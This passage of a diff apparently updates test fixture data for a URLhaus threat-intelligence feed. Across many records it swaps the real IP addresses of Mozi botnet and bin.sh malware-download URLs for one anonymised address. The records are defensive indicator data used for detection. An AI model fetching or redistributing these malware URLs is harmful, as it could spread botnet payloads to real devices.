UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027701700Z", + "original": "{\"id\":\"961110\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961110/\",\"url\":\"http://89.160.20.156:40023/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21246,18 +21246,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.48.204.10:53402/Mozi.m", + "original": "http://89.160.20.156:53402/Mozi.m", "scheme": "http", "port": 53402, - "domain": "115.48.204.10", - "full": "http://115.48.204.10:53402/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53402/Mozi.m" }, - "ip": "115.48.204.10" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694147012Z", - "original": "{\"id\":\"961109\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961109/\",\"url\":\"http://115.48.204.10:53402/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.48.204.10\",\"date_added\":\"2021-01-14 17:34:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027708700Z", + "original": "{\"id\":\"961109\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961109/\",\"url\":\"http://89.160.20.156:53402/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:34:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21296,18 +21296,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://175.214.73.205:36316/bin.sh", + "original": "http://89.160.20.156:36316/bin.sh", "scheme": "http", "port": 36316, - "domain": "175.214.73.205", - "full": "http://175.214.73.205:36316/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36316/bin.sh" }, - "ip": "175.214.73.205" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694150408Z", - "original": "{\"id\":\"961108\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961108/\",\"url\":\"http://175.214.73.205:36316/bin.sh\",\"url_status\":\"offline\",\"host\":\"175.214.73.205\",\"date_added\":\"2021-01-14 17:29:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.027715600Z", + "original": "{\"id\":\"961108\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961108/\",\"url\":\"http://89.160.20.156:36316/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:29:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21346,18 +21346,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://117.248.61.75:48105/bin.sh", + "original": "http://89.160.20.156:48105/bin.sh", "scheme": "http", "port": 48105, - "domain": "117.248.61.75", - "full": "http://117.248.61.75:48105/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48105/bin.sh" }, - "ip": "117.248.61.75" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694160317Z", - "original": "{\"id\":\"961107\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961107/\",\"url\":\"http://117.248.61.75:48105/bin.sh\",\"url_status\":\"offline\",\"host\":\"117.248.61.75\",\"date_added\":\"2021-01-14 17:28:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.027722500Z", + "original": "{\"id\":\"961107\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961107/\",\"url\":\"http://89.160.20.156:48105/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:28:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21395,18 +21395,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.231.245.237:40017/Mozi.m", + "original": "http://89.160.20.156:40017/Mozi.m", "scheme": "http", "port": 40017, - "domain": "42.231.245.237", - "full": "http://42.231.245.237:40017/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40017/Mozi.m" }, - "ip": "42.231.245.237" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694166569Z", - "original": "{\"id\":\"961103\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961103/\",\"url\":\"http://42.231.245.237:40017/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.231.245.237\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027729400Z", + "original": "{\"id\":\"961103\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961103/\",\"url\":\"http://89.160.20.156:40017/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21444,18 +21444,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.45.199:41906/Mozi.m", + "original": "http://89.160.20.156:41906/Mozi.m", "scheme": "http", "port": 41906, - "domain": "59.99.45.199", - "full": "http://59.99.45.199:41906/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41906/Mozi.m" }, - "ip": "59.99.45.199" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694171047Z", - "original": "{\"id\":\"961104\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961104/\",\"url\":\"http://59.99.45.199:41906/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.45.199\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027736300Z", + "original": "{\"id\":\"961104\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961104/\",\"url\":\"http://89.160.20.156:41906/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21493,18 +21493,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.237.48.61:38607/Mozi.m", + "original": "http://89.160.20.156:38607/Mozi.m", "scheme": "http", "port": 38607, - "domain": "42.237.48.61", - "full": "http://42.237.48.61:38607/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38607/Mozi.m" }, - "ip": "42.237.48.61" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694174854Z", - "original": "{\"id\":\"961105\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961105/\",\"url\":\"http://42.237.48.61:38607/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.237.48.61\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027743200Z", + "original": "{\"id\":\"961105\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961105/\",\"url\":\"http://89.160.20.156:38607/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21542,18 +21542,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.93.23.63:59331/Mozi.m", + "original": "http://89.160.20.156:59331/Mozi.m", "scheme": "http", "port": 59331, - "domain": "59.93.23.63", - "full": "http://59.93.23.63:59331/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59331/Mozi.m" }, - "ip": "59.93.23.63" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694178491Z", - "original": "{\"id\":\"961106\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961106/\",\"url\":\"http://59.93.23.63:59331/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.93.23.63\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027750100Z", + "original": "{\"id\":\"961106\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961106/\",\"url\":\"http://89.160.20.156:59331/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21591,18 +21591,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.126.118.45:53932/Mozi.m", + "original": "http://89.160.20.156:53932/Mozi.m", "scheme": "http", "port": 53932, - "domain": "182.126.118.45", - "full": "http://182.126.118.45:53932/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53932/Mozi.m" }, - "ip": "182.126.118.45" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694181948Z", - "original": "{\"id\":\"961102\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961102/\",\"url\":\"http://182.126.118.45:53932/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.126.118.45\",\"date_added\":\"2021-01-14 17:20:24 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027756900Z", + "original": "{\"id\":\"961102\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961102/\",\"url\":\"http://89.160.20.156:53932/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:24 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21640,18 +21640,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.230.152.22:58385/Mozi.m", + "original": "http://89.160.20.156:58385/Mozi.m", "scheme": "http", "port": 58385, - "domain": "42.230.152.22", - "full": "http://42.230.152.22:58385/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58385/Mozi.m" }, - "ip": "42.230.152.22" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694185434Z", - "original": "{\"id\":\"961101\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961101/\",\"url\":\"http://42.230.152.22:58385/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.230.152.22\",\"date_added\":\"2021-01-14 17:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027765100Z", + "original": "{\"id\":\"961101\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961101/\",\"url\":\"http://89.160.20.156:58385/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21689,18 +21689,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.105.12:57010/Mozi.m", + "original": "http://89.160.20.156:57010/Mozi.m", "scheme": "http", "port": 57010, - "domain": "186.33.105.12", - "full": "http://186.33.105.12:57010/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57010/Mozi.m" }, - "ip": "186.33.105.12" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694189341Z", - "original": "{\"id\":\"961099\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961099/\",\"url\":\"http://186.33.105.12:57010/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.105.12\",\"date_added\":\"2021-01-14 17:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027772100Z", + "original": "{\"id\":\"961099\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961099/\",\"url\":\"http://89.160.20.156:57010/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21738,18 +21738,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.137.33.111:59715/Mozi.m", + "original": "http://89.160.20.156:59715/Mozi.m", "scheme": "http", "port": 59715, - "domain": "222.137.33.111", - "full": "http://222.137.33.111:59715/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59715/Mozi.m" }, - "ip": "222.137.33.111" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694193269Z", - "original": "{\"id\":\"961100\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961100/\",\"url\":\"http://222.137.33.111:59715/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.137.33.111\",\"date_added\":\"2021-01-14 17:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027779100Z", + "original": "{\"id\":\"961100\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961100/\",\"url\":\"http://89.160.20.156:59715/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21787,18 +21787,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.231.120.221:57052/Mozi.m", + "original": "http://89.160.20.156:57052/Mozi.m", "scheme": "http", "port": 57052, - "domain": "42.231.120.221", - "full": "http://42.231.120.221:57052/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57052/Mozi.m" }, - "ip": "42.231.120.221" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694196645Z", - "original": "{\"id\":\"961094\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961094/\",\"url\":\"http://42.231.120.221:57052/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.231.120.221\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027786Z", + "original": "{\"id\":\"961094\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961094/\",\"url\":\"http://89.160.20.156:57052/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21836,18 +21836,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.117.11.37:60550/Mozi.m", + "original": "http://89.160.20.156:60550/Mozi.m", "scheme": "http", "port": 60550, - "domain": "182.117.11.37", - "full": "http://182.117.11.37:60550/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60550/Mozi.m" }, - "ip": "182.117.11.37" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694200032Z", - "original": "{\"id\":\"961095\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961095/\",\"url\":\"http://182.117.11.37:60550/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.117.11.37\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027793Z", + "original": "{\"id\":\"961095\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961095/\",\"url\":\"http://89.160.20.156:60550/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21885,18 +21885,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.104.144:39684/Mozi.m", + "original": "http://89.160.20.156:39684/Mozi.m", "scheme": "http", "port": 39684, - "domain": "186.33.104.144", - "full": "http://186.33.104.144:39684/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39684/Mozi.m" }, - "ip": "186.33.104.144" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694203468Z", - "original": "{\"id\":\"961096\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961096/\",\"url\":\"http://186.33.104.144:39684/Mozi.m\",\"url_status\":\"offline\",\"host\":\"186.33.104.144\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027800Z", + "original": "{\"id\":\"961096\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961096/\",\"url\":\"http://89.160.20.156:39684/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21934,18 +21934,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://122.188.41.69:43593/Mozi.a", + "original": "http://89.160.20.156:43593/Mozi.a", "scheme": "http", "port": 43593, - "domain": "122.188.41.69", - "full": "http://122.188.41.69:43593/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43593/Mozi.a" }, - "ip": "122.188.41.69" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694206844Z", - "original": "{\"id\":\"961097\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961097/\",\"url\":\"http://122.188.41.69:43593/Mozi.a\",\"url_status\":\"online\",\"host\":\"122.188.41.69\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027807Z", + "original": "{\"id\":\"961097\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961097/\",\"url\":\"http://89.160.20.156:43593/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21983,18 +21983,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.42.207.154:36066/Mozi.m", + "original": "http://89.160.20.156:36066/Mozi.m", "scheme": "http", "port": 36066, - "domain": "125.42.207.154", - "full": "http://125.42.207.154:36066/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36066/Mozi.m" }, - "ip": "125.42.207.154" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694210080Z", - "original": "{\"id\":\"961098\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961098/\",\"url\":\"http://125.42.207.154:36066/Mozi.m\",\"url_status\":\"offline\",\"host\":\"125.42.207.154\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027813900Z", + "original": "{\"id\":\"961098\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961098/\",\"url\":\"http://89.160.20.156:36066/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22032,18 +22032,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.230.82.41:35006/Mozi.m", + "original": "http://89.160.20.156:35006/Mozi.m", "scheme": "http", "port": 35006, - "domain": "115.230.82.41", - "full": "http://115.230.82.41:35006/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35006/Mozi.m" }, - "ip": "115.230.82.41" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694213407Z", - "original": "{\"id\":\"961093\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961093/\",\"url\":\"http://115.230.82.41:35006/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.230.82.41\",\"date_added\":\"2021-01-14 17:19:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027820800Z", + "original": "{\"id\":\"961093\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961093/\",\"url\":\"http://89.160.20.156:35006/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22081,18 +22081,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.90.177.157:38184/Mozi.m", + "original": "http://89.160.20.156:38184/Mozi.m", "scheme": "http", "port": 38184, - "domain": "113.90.177.157", - "full": "http://113.90.177.157:38184/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38184/Mozi.m" }, - "ip": "113.90.177.157" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694216623Z", - "original": "{\"id\":\"961091\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961091/\",\"url\":\"http://113.90.177.157:38184/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.90.177.157\",\"date_added\":\"2021-01-14 17:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027827700Z", + "original": "{\"id\":\"961091\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961091/\",\"url\":\"http://89.160.20.156:38184/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -22130,18 +22130,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://112.228.183.24:59027/Mozi.m", + "original": "http://89.160.20.156:59027/Mozi.m", "scheme": "http", "port": 59027, - "domain": "112.228.183.24", - "full": "http://112.228.183.24:59027/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59027/Mozi.m" }, - "ip": "112.228.183.24" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694219829Z", - "original": 